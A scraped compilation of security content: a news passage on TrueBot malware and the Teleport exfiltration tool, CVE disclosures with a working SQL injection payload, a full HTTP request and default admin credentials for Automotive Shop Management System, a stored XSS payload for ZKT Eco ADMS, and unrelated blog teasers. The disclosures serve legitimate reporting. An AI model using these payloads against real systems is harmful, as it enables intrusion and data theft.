The fact that the bug was weaponized merely a month after its public disclosure by Bishop Fox in mid-July 2022 suggests that "attackers are not only on the lookout for new infection vectors, but are also able to quickly test them and incorporate them into their workflow," Pereira said.

TrueBot infections in October, however, entailed the use of a different attack vector – i.e., Raspberry Robin – underscoring Microsoft's assessment about the USB worm's central role as a malware distribution platform.

The primary function of TrueBot is to collect information from the host and deploy next-stage payloads such as Cobalt Strike, FlawedGrace, and Teleport. This is followed by the execution of the ransomware binary after harvesting relevant information.

The Teleport data exfiltration tool is also notable for its ability to limit upload speeds and file sizes, thereby causing the transmissions to go undetected by monitoring software. On top of that, it can erase its own presence from the machine.

A closer look at the commands issued via Teleport reveals that the program is being exclusively used to collect files from OneDrive and Downloads folders as well as the victim's Outlook email messages.

"The Raspberry Robin delivery led to the creation of a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and Pakistan," Pereira said.

The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Truebot Malware Variant Leveraging Netwrix Auditor Bug and Raspberry Robin Worm

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /services/view_service.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: DaLao

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/services/view\_service.php?id=

Vulnerability location: /asms/admin/services/view\_service.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/services/view\_service.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/services/view\_service.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44838: bug_report/SQLi-1.md at main · GkaMei/bug_report

ZKTeco Xiamen Information Technology ZKBio ECO ADMS <=3.1-164 is vulnerable to Cross Site Scripting (XSS).

**ZKT Eco ADMS - Stored XSS**

 Hi All,

I was able to identify stored XSS in one online attendance system i.e. ZKT Eco ADMS (v 3.1-164 )(Automatic Data Master Server) is a powerful web-based time and attendance management software. which is used to configure the attendance devices and manage its users.

Cve ID assigned CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213

Technical details

1.  Login to ZKT Eco ADMS (default admin/admin)
2.  Click on System and click on Employee
3.  Click on Append button to add new Employee
4.  In Emp Name field Add your XSS payload. For testing I have used a non malicious code **"/><img src=a onerror=alert('stored-XSS');>**
5.  Click on Submit button, it will redirect you to the employee list, and our payload will be executed.

_XSS payload embedded in EMP NAME field._

_our payload executed successfully._

XSS has been fixed in latest versions after 3.1-164.

**Popular posts from this blog**

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

**CSV Injection in Acunetix version 13.0.201217092**

 Hi all,  I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions which can lead to admin system compromise. For testing I used the Admin account. Lets get to the technical details. CVE ID Assigned:  CVE-2022-29315  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315 https://www.cve.org/CVERecord?id=CVE-2022-29315 Vulnerable Version: Before version 14 Fixed Version: 14 and 14+ # Software description: Acunetix by Invicti Security is an application security testing tool built to help small & mid-size organizations around the world take control of their web security. # Technical Details & Impact: It was observed that Target page is vulnerable to CSV Injection, using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilitie

CVE-2022-44213: ZKT Eco ADMS - Stored XSS

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Tag

#windows